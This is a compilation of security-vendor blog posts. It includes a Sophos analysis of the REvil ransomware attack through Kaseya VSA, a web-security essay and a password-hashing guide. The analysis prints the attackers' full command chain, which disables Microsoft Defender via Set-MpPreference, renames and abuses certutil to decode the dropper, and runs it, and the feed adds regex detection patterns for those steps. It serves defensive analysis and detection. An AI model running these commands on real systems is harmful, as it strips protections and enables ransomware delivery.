Our engineering team is already busy planning the integration of Capsule8 technology into our Adaptive Cybersecurity Ecosystem (ACE). We will also feature Capsule8 technology in our Extended Detection and Response (XDR) solutions, Intercept X server protection products, and Sophos Managed Threat Response (MTR) and Rapid Response services.

Capsule8 technology will provide new Linux telemetry and event information, further enhancing Sophos’ data lake with additional context for advanced threat hunting, security operations and customer protection practices. It also strengthens the ability of Sophos MTR operators and customers using Sophos XDR to find and neutralize suspicious activity before it becomes malicious.

The addition of the Capsule8 technologies to the Sophos portfolio is exciting for all of us at Sophos, and I look forward to sharing further details of the integration later this year.

In the meantime, on behalf of Sophos I’d like to extend a warm welcome to the Capsule8 employees, customers and partners; we’re delighted to be working with you.

Source: Sophos

15

Jul

In the cybersecurity world, it’s only natural to balance risks and security measures. After all, there is no way to achieve absolute security and therefore you have to say stop somewhere. However, if you rely on excuses and underestimate the threats, you’re very likely to become a victim of a serious attack. Cybercriminals are smart – they attack those who make it easy for them.

I’ve seen businesses treat web application security as less important than, for example, having an antivirus. I can understand such an approach if a business just has a simple marketing site on WordPress. However, I cannot get my head around such carelessness if the business develops professional B2B web applications for huge corporations, which use these web applications to process tons of sensitive information! And yet, yes, this happens!

Here are some of the excuses that I’ve heard when it comes to web application security. I’m including them to help you avoid similar pitfalls when you decide how to proceed with your journey.

“Our software is only for internal use so there’s no attack risk”

The assumption that malicious hackers only attack web applications that are exposed to the public is one of the primary reasons for major data breaches. Not only are inside jobs quite common in the world of cybersecurity but attackers can find a way into the internal network and access internal web applications from there.

You should always treat the security of your web applications the same way no matter whether they are exposed to the public, used through internal networks and VPNs only, or protected by IP filtering and authentication. That means that, for example, if your application is accessible only from a selected range of IPs and requires authentication, it doesn’t mean it’s secure by design. Even worse, criminals may actually seek entry into such applications, in particular, knowing that their creators often treat vulnerabilities as less of a threat and therefore do not even check for them.

In conclusion, scan every application for security vulnerabilities, no matter how well it is protected by network security measures and authentication!

“Our implementation makes it impossible to have vulnerabilities”

I’ve heard this argument from a company that uses Hibernate ORM for its Java development. The construction of Hibernate supposedly eliminates SQL injection vulnerabilities because the database always returns a single result set. Unfortunately, that is not true. Only some SQL injection attacks are eliminated by this feature of Hibernate, not all of them. This feature also has no impact whatsoever on vulnerabilities that are not related to SQL.

While modern development and implementation environments make some attacks more difficult, there is no environment that can help you prevent all of them – or even a majority of them. If you think that the way that you designed your development and implementation is enough without any security testing included, think again.

In conclusion, test all your applications for security vulnerabilities no matter what development and implementation environments you use (even if they supposedly eliminate security errors).

“We run a security scan once in a while and we never found anything serious”

Some businesses believe that it’s enough to scan their applications every few months, for example, only before a major release. They do not see the need to verify the security of each release candidate and are even less keen to include security scanning as part of their regular DevOps pipelines. The argument is that the scans have yielded no major problems to date.

Such an approach may be compared to leaving your car door unlocked (and your keys in the ignition) in front of the supermarket. Sure, in the majority of cases, nothing will happen because there will be no car burglars around. However, if just one burglar is around and notices that your car is not locked, your vehicle will change its owner pretty quickly. Same in this case: just one major vulnerability that goes undetected between major releases may result in a security breach exposing all your sensitive data and ruining your business reputation.

In conclusion, test your supposedly safe applications even more thoroughly than the ones you’d think are unsafe.

Better safe than sorry

The phrase “better safe than sorry” is very applicable for cybersecurity (and security in general). In my opinion, whatever security decisions you make for your business, you should compare these with the security of your own personal assets. For example, if your apartment is in a block with security at the front door, does it mean you can leave your door unlocked? If no break-in happened in your neighborhood recently, does it mean that you can leave your window wide open when you go to work?

If instead of making excuses you try to assume the worst scenarios, you are much less likely to be the hero of the next headline news about a data breach. And the cost of including web application security in your SDLC compared to the losses that you could incur as a result of the data breach is just like the cost of a door lock compared to the cost of all the valuables in your home.

Make the right choice, not excuses.

Source: Acunetix

12

Jul

At Invicti, we are absolutely thrilled to be recognized for the first time in the Magic Quadrant for Application Security Testing this year.

Gartner is a leading IT research and advisory firm that helps businesses of all sizes evaluate technology and make informed decisions. We feel our acknowledgment in the report is a big deal, especially for a company of our size, and it marks a recognition by Gartner that the application security testing market and technology landscape are evolving. We believe that our approach is at the vanguard of that evolution.

Application security testing is a broad category. It includes everything from software composition analysis (SCA) to static, dynamic, and interactive application security testing. And while traditional SCA and static application security testing (SAST) certainly have their place, especially for taking inventory of open-source components and analyzing source code, a complete security program also requires DAST and IAST.

We are the only vendor in the Magic Quadrant that takes this approach, providing an orchestrated DAST and IAST platform. Invicti Security has intentionally developed Netsparker and Acunetix to uniquely orchestrate DAST and IAST, enabling organizations of all sizes to build a continuous and automated web application security practice.

Our mission is to enable you to vastly improve your security posture with scale and automation, and we do it by delivering unique products. We feel only Invicti – with our DAST, IAST, and dynamic SCA – can cover all of your apps (in development, in production, and even third-party). And only Invicti can do this with the scale, speed, accuracy, and automation you need for your agile (or DevOps) environment.

Bottom line: our intelligent automation, 50+ integrations, and benchmark low rate of false positives make us stand out in a very crowded field of players in application security.

Of course, we’re only getting started. We’ve got lots in store as we continue to innovate on both Netsparker and Acunetix. We look forward to pushing the market to a more modern and scalable approach to application security.

Interested parties can access the full 2021 Gartner Magic Quadrant for Application Security Testing here.

Source: Acunetix

7

Jul

On July 2, while many businesses had staff either already off or preparing for a long holiday weekend, an affiliate of the REvil ransomware group launched a widespread crypto-extortion gambit. Using an exploit of Kaseya’s VSA remote management service, the REvil actors launched a malicious update package that targeted customers of managed service providers and enterprise users of the on-site version of Kaseya’s VSA remote monitoring and management platform.

REvil is a ransomware-as-a-service (RaaS), delivered by “affiliate” actor groups who are paid by the ransomware’s developers. Customers of managed service providers have been a target of REvil affiliates and other ransomware operators in the past, including a ransomware outbreak in 2019 (later attributed to REvil) that affected over 20 small local governments in Texas. And with the decline of several other RaaS offerings, REvil has become more active. Its affiliates have been exceedingly persistent in their efforts as of late, continuously working to subvert malware protection. In this particular outbreak, the REvil actors not only found a new vulnerability in Kaseya’s supply chain, but used a malware protection program as the delivery vehicle for the REvil ransomware code.

Spike in SophosLabs telemetry caused by REvil detections on July 2, 2021, showing hundreds of detections at its peak.

REvil’s operators posted to their “Happy Blog” today, claiming that more than a million individual devices were infected by the malicious update. They also said that they would be willing to provide a universal decryptor for victims of the attack, but under the condition that they be paid $70,000,000 worth of Bitcoin.

Managed Malware Delivery

The outbreak was delivered via a malicious update payload sent out to VSA servers, and in turn to the VSA agent applications running on managed Windows devices. It appears this was achieved using a zero-day exploit of the server platform. This gave REvil cover in several ways: it allowed initial compromise through a trusted channel, and leveraged trust in the VSA agent code—reflected in anti-malware software exclusions that Kaseya requires to be set up for its application and agent “working” folders. Anything executed by the Kaseya Agent Monitor is therefore ignored because of those exclusions—which allowed REvil to deploy its dropper without scrutiny.

The Kaseya Agent Monitor (at C:\PROGRAM FILES (X86)\KASEYA\<ID>\AGENTMON.EXE, with the ID being the identification key for the server connected to the monitor instance) in turn wrote out the Base64-encoded malicious payload AGENT.CRT to the VSA agent “working” directory for updates (by default, C:\KWORKING). AGENT.CRT is encoded to prevent malware defenses from performing static file analysis with pattern scanning and machine learning when it is dropped. These technologies normally work on executable files (though, as we’ve noted, since this file was deployed within the “working” directory excluded under Kaseya’s requirements, this would not likely have come into play).

After deploying the payload, the Kaseya agent then ran the following Windows shell commands, concatenated into a single string:

The command line executed by the malicious Kaseya update.

Here’s a breakdown of what’s going on here:

ping 127.0.0.1 -n 5693 > nul

The first command is essentially a timer. The PING command has a -n parameter which instructs the Windows PING.EXE tool to send echo requests to the localhost (127.0.0.1)—in this case, 5,693 of them. This acted as a “sleep” function, delaying the subsequent PowerShell command for 5,693 seconds—roughly 94 minutes. The value 5,693 varied per victim, indicating that the number was randomly generated on each VSA server as part of the agent procedure that sent the malicious command down to victims.

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

The next part of the command string is a PowerShell command that attempts to disable core malware and anti-ransomware protections offered by Microsoft Defender:

  • Real-time protection
  • Network protection against exploitation of known vulnerabilities
  • Scanning of all downloaded files and attachments
  • Scanning of scripts
  • Ransomware protection
  • Protection that prevents any application from gaining access to dangerous domains that may host phishing scams, exploits, and other malicious content on the Internet
  • Sharing of potential threat information with Microsoft Active Protection Service (MAPS)
  • Automatic sample submission to Microsoft

These features are turned off to prevent Microsoft Defender from potentially blocking subsequent malicious files and activity.

copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe

This creates a copy of the Windows certificate utility, CERTUTIL.EXE—a frequently used Living-Off-the-Land Binary (LOLBin), capable of downloading and decoding web-encoded content. The copy is written to C:\WINDOWS\CERT.EXE.

echo %RANDOM% >> C:\Windows\cert.exe

This appends a random 5-digit number to the end of the copied CERTUTIL. This may have been an attempt to prevent anti-malware products that watch for CERTUTIL abuse from recognizing CERT.EXE as a CERTUTIL copy by signature.

C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe

The copied CERTUTIL is used to decode the Base64-encoded payload file AGENT.CRT and write it to an executable, AGENT.EXE, in the Kaseya working folder. AGENT.EXE carries a valid Authenticode signature, signed with a certificate for “PB03 TRANSPORT LTD.” We have only seen this certificate associated with REvil malware; it may be stolen or fraudulently obtained. AGENT.EXE contains a compiler timestamp of July 1, 2021 (14:40:29) – a day before the attack.

The digital signature on the REvil Kaseya dropper.

del /q /f c:\kworking\agent.crt C:\Windows\cert.exe

The original payload file C:\KWORKING\AGENT.CRT and the copy of CERTUTIL are deleted.

c:\kworking\agent.exe

Finally, AGENT.EXE is started by Kaseya’s AGENTMON.EXE process (inheriting its system-level privilege)—and the actual dropping of ransomware begins.
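As an added example (not from the Sophos analysis and not Kaseya’s code), the following Python flags the evasion steps in that command string when run over process-creation command lines of the kind an EDR or Sysmon would record. The sample records are constructed; the only page-specific path it relies on is Kaseya’s default working folder, C:\KWORKING.

```python
import re
from pathlib import PureWindowsPath
from typing import List, Tuple

# Process-creation command lines, constructed for this example. "vsa_update"
# mirrors the chain analysed above (paths are Kaseya's defaults); the other
# three are routine administration that must not be flagged.
SAMPLE_CMDLINES = {
    "vsa_update": (
        r"ping 127.0.0.1 -n 5693 > nul & "
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference "
        r"-DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true "
        r"-DisableIOAVProtection $true -DisableScriptScanning $true "
        r"-EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode "
        r"-Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & "
        r"copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & "
        r"echo %RANDOM% >> C:\Windows\cert.exe & "
        r"C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & "
        r"del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe"
    ),
    "hash_check": r"certutil.exe -hashfile C:\Installers\setup.msi SHA256",
    "short_wait": r"cmd.exe /c ping 127.0.0.1 -n 3 > nul & net start Spooler",
    "reenable_rtp": r"powershell.exe Set-MpPreference -DisableRealtimeMonitoring $false",
}

SLEEP_THRESHOLD = 300  # localhost echo requests pace at ~1/s; 5 min+ is a timer

PING_RE = re.compile(r"^ping(?:\.exe)?\s+(?:127\.0\.0\.1|localhost)\s+-n\s+(\d+)", re.I)
MP_RE = re.compile(r"\bset-mppreference\b(.*)$", re.I)
TAMPER_RE = re.compile(
    r"-disable\w+\s+\$true|-mapsreporting\s+disabled|-submitsamplesconsent\s+neversend", re.I)
COPY_RE = re.compile(r"^copy\b.*\bcertutil\.exe\s+(\S+)", re.I)
APPEND_RE = re.compile(r"^echo\b.*?>>\s*(\S+\.exe)\s*$", re.I)
DECODE_RE = re.compile(r"^(\S+)\s+-decode\s+\S+\s+(\S+\.exe)", re.I)
DEL_RE = re.compile(r"^del\b(.*)$", re.I)
KWORKING_RE = re.compile(r"^\S*\\kworking\\\S+\.exe\b", re.I)  # default VSA working folder

HIGH = {"defender_tamper", "renamed_certutil_decode", "exec_from_excluded_folder"}


def _name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def split_commands(cmdline: str) -> List[str]:
    """Drop a leading 'cmd.exe /c' and split the one-liner on & / &&."""
    body = re.sub(r"^\S*cmd(?:\.exe)?\s+/c\s+", "", cmdline.strip(), flags=re.I)
    return [s.strip() for s in re.split(r"&&|&", body) if s.strip()]


def analyse(cmdline: str) -> List[Tuple[str, str]]:
    """Return (category, detail) findings for one process command line.

    State carried across segments lets a later '-decode' or 'del' be tied to
    the renamed certutil copy made earlier in the same chain.
    """
    findings: List[Tuple[str, str]] = []
    renamed: set = set()  # basenames certutil.exe was copied to
    for seg in split_commands(cmdline):
        if (m := PING_RE.match(seg)) and int(m.group(1)) >= SLEEP_THRESHOLD:
            findings.append(("ping_sleep", m.group(1)))
        if (m := MP_RE.search(seg)) and (hits := TAMPER_RE.findall(m.group(1))):
            findings.append(("defender_tamper", ",".join(h.split()[0].lower() for h in hits)))
        if (m := COPY_RE.match(seg)) and _name(m.group(1)) != "certutil.exe":
            renamed.add(_name(m.group(1)))
            findings.append(("certutil_renamed_copy", _name(m.group(1))))
        if m := APPEND_RE.match(seg):
            findings.append(("executable_appended", _name(m.group(1))))
        if m := DECODE_RE.match(seg):
            cat = "renamed_certutil_decode" if _name(m.group(1)) in renamed else "decode_to_exe"
            findings.append((cat, m.group(2).lower()))
        if (m := DEL_RE.match(seg)) and any(_name(a) in renamed for a in m.group(1).split()):
            findings.append(("renamed_tool_deleted", ",".join(sorted(renamed))))
        if KWORKING_RE.match(seg):
            findings.append(("exec_from_excluded_folder", seg.lower()))
    return findings


def verdict(findings: List[Tuple[str, str]]) -> str:
    """Any high-confidence behaviour, or three distinct low ones, is an alert."""
    cats = {c for c, _ in findings}
    if cats & HIGH or len(cats) >= 3:
        return "alert"
    return "suspicious" if cats else "clean"


if __name__ == "__main__":
    for label, line in SAMPLE_CMDLINES.items():
        hits = analyse(line)
        print(f"{label:12s} {verdict(hits):10s} {[c for c, _ in hits]}")
```

The Set-MpPreference rule is the one a vendor exclusion cannot hide: the tampering shows up in the process-creation record regardless of which folder the payload is later written to.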

Side-loading for stealth

The disassembled code of AGENT.EXE.

AGENT.EXE dropped an unexpected file: MSMPENG.EXE, an outdated and expired version of Microsoft’s Antimalware Service executable. This is a benign yet vulnerable application from Windows Defender, version 4.5.218.0, signed by Microsoft on March 23, 2014:

This version of MSMPENG.EXE is vulnerable to side-loading attacks—and we’ve seen this particular version of the application abused before. In a side-load attack, malicious code is put into a dynamic link library (DLL) named to match one required by the targeted executable, and usually placed into the same folder as the executable so it is found before a legitimate copy.

In this case, AGENT.EXE dropped a malicious file named MPSVC.DLL alongside the MSMPENG.EXE executable. AGENT.EXE then executed MSMPENG.EXE, which found the malicious MPSVC.DLL and loaded it into its own memory space.

The MPSVC.DLL also contains the “PB03 TRANSPORT LTD.” certificate that was applied to AGENT.EXE. The MPSVC.DLL appears to have been compiled on Thursday July 1, 2021 (14:39:06), just prior to the compilation of AGENT.EXE.

The malicious code in MPSVC.DLL hijacks the normal execution flow of the Microsoft-branded process from the moment MSMPENG.EXE calls the ServiceCrtMain function in the malicious MPSVC.DLL (this is also the main function in a benign MPSVC.DLL):

Once the DLL is loaded into memory, the malware deletes it from disk.

MSMPENG.EXE, now under the control of the malicious MPSVC.DLL, begins to encrypt the local disk, connected removable drives and mapped network drives, all from a Microsoft-signed application that security controls typically trust and allow to run unhindered.

From here on out, this REvil ransomware is technically very similar to other recent REvil extortion operations. It executes a NetShell (netsh) command to change firewall settings to allow the local Windows system to be discovered on the local network by other computers (netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes). Then it begins encrypting files.

The REvil ransomware performs an in-place encryption attack, and so the encrypted documents are stored on the same sectors as the original unencrypted document, making it impossible to recover the originals with data recovery tools. REvil’s efficient file system activity shows specific operations, performed on dedicated threads:

The ransomware runs storage access (the reading of original documents and writing of encrypted documents), key-blob embedding, and document renaming on multiple individual threads to do its damage faster. As each file is encrypted, a random extension is added to the end of its name.

Step | Thread | Operation                       | Purpose
-----|--------|---------------------------------|----------------------------------------------------------------------
1    | A      | CreateFile (Generic Read)       | Open original document for reading only.
2    | A      | ReadFile                        | Read last 232 bytes of original document (look for decryption blob).
3    | A      | CloseFile                       | Close original document (no changes made).
4    | A      | CreateFile (Generic Read/Write) | Open original document for reading and writing.
5    | B      | ReadFile                        | Read original document.
6    | C      | WriteFile                       | Write encrypted document over the original document.
7    | C      | WriteFile                       | Add decryption blob, 232 bytes, to end of file.
8    | B      | CloseFile                       | Close now-encrypted document.
9    | B      | CreateFile (Read Attributes)    | Open encrypted document.
10   | B      | SetRenameInformationFile        | Rename document by adding a file type extension, for example ‘.w3d1s’.
11   | B      | CloseFile                       | Close now-renamed encrypted file.

A ransom note is dropped using the same random extension as part of the filename (for example, “39ats40-readme.txt”.)

There are some factors that stand out in this attack when compared to others. First, because of its mass deployment, this REvil attack makes no apparent effort to exfiltrate data. Attacks were customized to some degree based on the size of the organization, meaning that REvil actors had access to VSA server instances and were able to identify individual customers of MSPs as being different from larger organizations. And there was no sign of deletion of volume shadow copies—a behavior common among ransomware that triggers many malware defenses.

A breakdown of the REvil Kaseya attack flow.
0 The main install command
1 PowerShell command attempts to stop Windows Defender
2 Renamed CERTUTIL.EXE decodes AGENT.EXE from AGENT.CRT
3 AGENT.EXE is executed, drops MSMPENG.EXE and MPSVC.DLL into C:\Windows
4 MSMPENG.EXE is executed, and side-loads the REvil DLL
5 Files are encrypted, ransom note created
6 Netsh.exe turns on network discovery


Lessons learned

The tactics to evade malware protection used here—poisoning a supply-chain well, taking advantage of vendor carve-outs from malware protection, and side-loading with an otherwise benign (and Microsoft-signed) process—are all very sophisticated. They also show the potential risks of excluding anti-malware protection from folders where automated tasks write and execute new files. While zero-day supply-chain exploits are rare, we’ve already seen two major systems management platforms exploited in the past year. While Sunburst was apparently a state-funded attack, ransomware operators clearly have the resources to continue to acquire additional exploits.

Even so, the anti-malware evasion used by this REvil attack was not unstoppable, and was detected by a number of antimalware products. The REvil payload itself was detectable by Sophos as Mal/Generic-S by Intercept X, and Troj/Ransom-GIP and Troj/Ransom-GIS, as well as HPmal/Sodino-A in on-premises protection products. The REvil-specific code certificate is also detected as Mal/BadCert-Gen. While the protection exclusions may have allowed the REvil dropper to be installed on machines, the ransomware itself was detected. Intercept X’s cryptoransomware protection feature is not constrained by folder exclusions, and would block file encryption anywhere on protected drives.

Source: Sophos

6

Jul

We are pleased to announce that today, June 24, Intercept X now supports Windows ARM64 devices. This is an exciting milestone, as devices using ARM64 processors are increasingly common in many organizations.

Available to all Intercept X customers, this initial release includes many of the powerful defensive capabilities of Intercept X, with more features being added later this year. To start protecting your Windows ARM64 devices, you simply need to log into your Sophos Central console and run the Windows installer.

Which products are supported?

  • Intercept X Advanced
  • Intercept X Advanced with EDR
  • Managed Threat Response (MTR Standard and MTR Advanced)

Which features are available now?

  • Deep learning file scanning
  • Anti-ransomware (CryptoGuard)
  • Application control
  • Web protection
  • Cross-estate SQL querying for threat hunting and IT security operations hygiene (Live Discover, EDR)
  • Remote Terminal access for further investigation and response (Live Response, EDR)

What’s coming later?

  • Web control
  • Device control
  • Endpoint Firewall
  • File Download Reputation
  • DLP
  • Device encryption (Central Device Encryption)

Getting started

Existing customers simply need to run the Windows installer available in Sophos Central on their ARM64 devices.

If you’re new to Intercept X, try an online demo or free trial.

Source: Sophos

1

Jul

Addressing an organization’s data security challenges requires some heavy lifting – no question about it. Whether data security worries center around internal security lapses or stem from the harsh reality of being targeted by those with malicious intent, organizations face a constant need to be on the alert and protective of sensitive data.
Rather than cobble together a piecemeal solution strategy, relying on a trusted solutions provider that offers a suite of integrated, scalable data security solutions can provide relief. Knowing what data needs to be protected, classifying the data, applying controls to the data without slowing down business processes, and sharing all this sensitive data securely can provide IT and security leaders peace of mind.

The Challenge of Gaining Data Visibility

With the massive amount of data exchanged daily, knowing what data exists, where it lives, who can access it, and how it is ultimately sent is critical to organizational data security. The visibility factor is naturally a concern for CISOs, as a recent HelpSystems data security study attests and is square one when it comes to data security and the policies and solutions needed for a proactive security stance.
Diving into true data visibility includes defining policies and procedures, ensuring they are working and being used, and then assessing which technologies can be put in place to help automatically and efficiently bolster the security needed around sensitive data.

The Challenge of Identifying What Data Needs Protection

To keep the flow of business running for mission-critical communications and not throw unnecessary productivity barriers up, it’s important to first address the fact that not all the vast amount of data exchanged is equal and in need of extensive protection.
Organizations can keep business running (minus potential data breaches) by implementing a data classification solution that applies markers and halts only the data that meets the protection criteria you set. Metadata labels allow other security solutions within the environment to understand which data is sensitive and requires further protection along its journey, based on the organizational policy set.
With data classification in place, you can identify and sort out what data is sensitive and in need of protection and which is more mundane and shareable without the more nuanced layers of security to streamline secure data exchanges.

The Challenge of Data Protection Efficiency

Many traditional data security solutions end up blocking “safe” data alongside the potentially malicious or harmful data they are meant to stop. These false positives or false negative alerts can quickly spiral out of control, unnecessarily slowing down the flow of business.
These traditional solutions focus on tight control, but at a cost. At some point, the data handcuffs can get too restrictive and the need to share and access easily (and securely) becomes a top priority for productivity. However, protecting data throughout its lifecycle is not a one-size-fits-all process.
Putting an Adaptive Data Loss Protection (A-DLP) solution in place can take organizations beyond the “block everything” mode by going on the defense to detect and prevent unauthorized sharing before any breach occurs. With DLP in place, organizations gain flexibility and can intelligently inspect and sanitize both structured and unstructured (meta) data within emails, files being transferred via web or cloud, and endpoints to ensure the specified security policy is applied automatically.
This flexibility is of particular importance to highly regulated industries and to adhere to data privacy laws such as HIPAA, PCI-DSS, CCPA, GDPR, and more, which specify the level of protection that should surround data at all points in its journey.

The Challenge of Sharing Files Securely and Efficiently

Once data has been classified and sanitized, the challenge of sending it to a third-party or internally must be met. A secure managed file transfer (MFT) solution can rise to the challenge while meeting stringent compliance requirements for end-to-end protection. Automated workflows, as well as auditing and reporting functionality, add increased security and transparency around file transfers large and small. This reduces the human factor risks so often responsible for file transfer errors.
Combining MFT with Adaptive DLP can further ensure that any files sent and received do not contain sensitive data.

The Challenge Remote Work Poses

As organizations reimagine how and where work gets accomplished, a growing number of workers will continue working from wherever is most convenient and at times on their personal devices. While this flexibility is mostly welcomed, it does not come without data security threats. Employees, of course, are among an organization’s most valuable assets, but they also pose some of the biggest risks without education, intelligent technology solutions, and policies and procedures that are easy to follow to ensure data security.

Data is unquestionably more vulnerable with this more flexible work environment and the human factor continues to pose threats. When people are busy, tired, or pressured is when mistakes around securing data tend to be made.

The need to communicate and collaborate securely remains and the risk of exposing sensitive data both within and outside of the organizations grows higher with more user access points and the ad hoc use of non-approved collaboration and file transfer processes.

Organizations need mechanisms that let people work yet have a safety net to protect them (and their employers) from doing the wrong thing data security-wise. With more demand for functionality comes more risk in sharing data with third parties or via the cloud, upping the risk of a data breach or compliance requirement failures.

The Challenge of Managing Multiple Security Solutions

While it’s easy to see that layers of security can help freeze insecure data movement in its tracks, reduce human error risks, and ensure that even hidden sensitive data isn’t inadvertently accessed, managing those layers with multiple vendors can create productivity bottlenecks.
One way to alleviate pressure on IT staff is to work with a single trusted vendor capable of delivering multiple layers of security for operational simplicity. This can help ensure that your data classification, data loss prevention, and managed file transfer tools are well integrated and scalable. If the elements that make up your data security suite are not easy and intuitive to use, the suite will lose its effectiveness as the last barrier to employees making a data security error.

Facing Data Security Challenges with a Security Suite

A solid security suite is one flexible enough to enforce your security policies, rather than forcing your processes to fit the solution itself. One benefit of employing a suite-style solution is that it can be implemented in modular fashion. You can deploy a single software solution to address today’s specific data security issue and be comfortable knowing you can add additional layers of security as your needs grow and change. In addition, you can take advantage of solution integrations and enjoy economies of scale.

Data security can encompass any one or a combination of these technologies:

Data Classification: Attaches markings to data to trigger encryption policies. There is no need for a separate encryption job when this is employed.

Data Loss Prevention: Enforces compliance policies with data redaction and sanitization of data as it looks for classification tags and removes risks while letting “safe” data pass through. Over-policing of data typically seen with DLP enforcement can be avoided.

Integrated Email Security: Detect, defend against, and deter phishing, business email compromise, and other advanced identity deception email attacks.

Managed File Transfer: Provides a secure platform to more easily share data with trusted individuals and includes automation, auditing, and reporting functionality.

Digital Rights Management: Add a security wrapper around data wherever it travels, and control and revoke access as needed after it leaves your organization.

How Can We Help You Meet Your Data Security Challenges?

Every organization has different data security challenges, requiring a customized approach to how security layers are applied. Let us show you how you can face your data security challenges more easily with help from the suite of data security solutions from HelpSystems.


Source: Boldon James

28

Jun

The term sensitive data exposure means letting unauthorized parties access stored or transmitted sensitive information such as credit card numbers or passwords. Most major security breaches worldwide result in some kind of sensitive data exposure.

Exploiting an attack vector such as a web vulnerability is just the first step that the attacker takes. Further steps usually involve one of three goals: stealing sensitive information, planting malicious software (for example, to attack other targets or enable permanent control/spying), or escalating to other systems (where this choice repeats). Obviously, stealing sensitive information such as credit card data is the most profitable goal for the attacker and most cyberattacks are driven by money, hence sensitive data exposure is the most common attack goal.

Just like it is possible to create software with next to no vulnerabilities, it is also possible to create software that prevents the attacker from accessing sensitive information. Sensitive data exposure is caused by bad design or implementation of computer systems and software as well as misconfiguration of such systems and software.

Defining sensitive data

When you build a web application, you must clearly define what you consider to be sensitive data. While some examples are obvious, like credit card numbers, authentication credentials, or health records, others may not seem so straightforward. Even if a piece of information is to be displayed onscreen by the application, it may still be considered sensitive in transit and storage.

Any type of data that can be considered personal data or private data should be considered sensitive. This means even data such as first and last name, date of birth, or even an email address. Criminals are after such data because they can correlate personal information stolen from other sources to create profiles for identity theft.

Any data related to financials should also be considered sensitive and this does not mean just credit card numbers. For example, bank account numbers, both internal and IBAN, should also be considered sensitive as well as any transaction amounts.

Depending on the industry that your business deals in, some data may be not only considered sensitive but also covered by compliance regulations. Make sure that all such data is secured, both in transit and in storage, otherwise you will fall out of compliance.

Sensitive data exposure vulnerabilities in transit

Most websites and web applications nowadays are accessible via secure SSL/TLS connections. Many go as far as enforcing such connections using HTTP strict transport security (HSTS). As a result of this, many web application designers think that it’s safe to transmit sensitive information between the client and the server using clear text.

This mindset is the primary cause of sensitive data exposure in transit. Unfortunately, despite the fact that SSL/TLS provides a high degree of protection, there are cases when a man-in-the-middle attack (MITM) on network traffic is possible. If the attacker somehow manages to access data transmitted between the web application and the user, and this data includes, for example, credit card numbers or clear text passwords, the attack ends up in sensitive data exposure.

Therefore, the best way to protect your web application against sensitive data exposure is never to transmit any sensitive data using clear text and always use cryptographic algorithms to secure them. Note that these should not be weak crypto algorithms because the attacker may store the intercepted data and later attempt to break the encryption using powerful GPUs.

Sensitive data exposure vulnerabilities in storage

Storing sensitive data securely is just as important as transmitting it securely, if not more. If an attacker exploits a vulnerability and gains access to your website or web application, for example, using an SQL injection, they may be able to access the content of your entire database. If any sensitive information is stored in the database without encryption, it’s a guaranteed leak.

When storing sensitive information, using renowned, secure, and strong encryption algorithms is even more important than in the case of transit. A weak algorithm will let the attacker quickly run brute force attacks on the stolen encrypted data and decode the original information.

In addition to strong database encryption, some types of sensitive data need extra protection. For example, passwords that are encrypted or hashed using even the strongest algorithms can be easily broken if the password itself is a weak password. Therefore, avoiding common password vulnerabilities is just as important as encryption or hashing.

Sensitive data exposure vulnerabilities in email

It is shocking to see how many businesses and institutions forget that email is not a secure channel and sensitive data should never be transmitted using this medium. Email connections between the client and the server may be encrypted but the connections between servers are usually done using plain text. The email body is not encrypted, either. And the recipient of the email has no control over how securely their email content is stored or whether it is actually destroyed when the email is deleted client-side.

If your web application sends emails, you should never send any sensitive data in them and, instead, use the web application itself to present or accept sensitive information. For example, you should never send a new password via email; display it for the user on a web page instead. An institution should also never send any personal and sensitive data in clear text over email, which is, unfortunately, the way that many government institutions do it in many countries.

Protecting sensitive data

Sensitive data exposure is considered important enough by OWASP (the Open Web Application Security Project) to feature in the OWASP Top 10 as a separate category. In the 2017 edition, this category was considered the third most important common flaw. We also believe that in the upcoming 2021 OWASP Top 10 this category will only gain in importance. Therefore, you should take great care to protect your sensitive information and avoid sensitive data exposure.

Protecting your sensitive data is really easy as long as you use cryptographic algorithms in transit and in storage along with any side-measures such as, for example, proper key management (so that your keys are as safe as the data itself). In some cases, you don’t even need to transmit or store encrypted data, you can use hash algorithms. Password hashing is the most efficient way to make sure that passwords are never stolen, both in transit and in storage.
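As an added example (not Acunetix’s code), the following Python shows the storage side of that advice: a salted, slow password hash with constant-time verification, a rehash check so the cost can be raised later, and a pre-hash policy check, since no hash protects a password like “password123”. The iteration count, record format and small denylist are choices made for this demonstration.

```python
import hashlib
import hmac
import secrets
from typing import List

ALGORITHM = "pbkdf2_sha256"
ITERATIONS = 600_000  # tune so one hash costs tens of milliseconds on your hardware
SALT_BYTES = 16

# Small constructed denylist standing in for a breached-password list.
COMMON_PASSWORDS = {"password", "password123", "123456", "qwerty", "letmein"}


def hash_password(password: str, iterations: int = ITERATIONS) -> str:
    """Return a self-describing record: algorithm$iterations$salt_hex$digest_hex.

    A fresh random salt per user means two users with the same password get
    different records, so a stolen table cannot be attacked in bulk.
    """
    salt = secrets.token_bytes(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"{ALGORITHM}${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iterations; compare in constant time."""
    try:
        algorithm, iterations, salt_hex, digest_hex = stored.split("$")
        if algorithm != ALGORITHM:
            return False
        recomputed = hashlib.pbkdf2_hmac(
            "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
        )
        return hmac.compare_digest(recomputed, bytes.fromhex(digest_hex))
    except ValueError:  # malformed record: wrong field count, bad hex or bad int
        return False


def needs_rehash(stored: str, iterations: int = ITERATIONS) -> bool:
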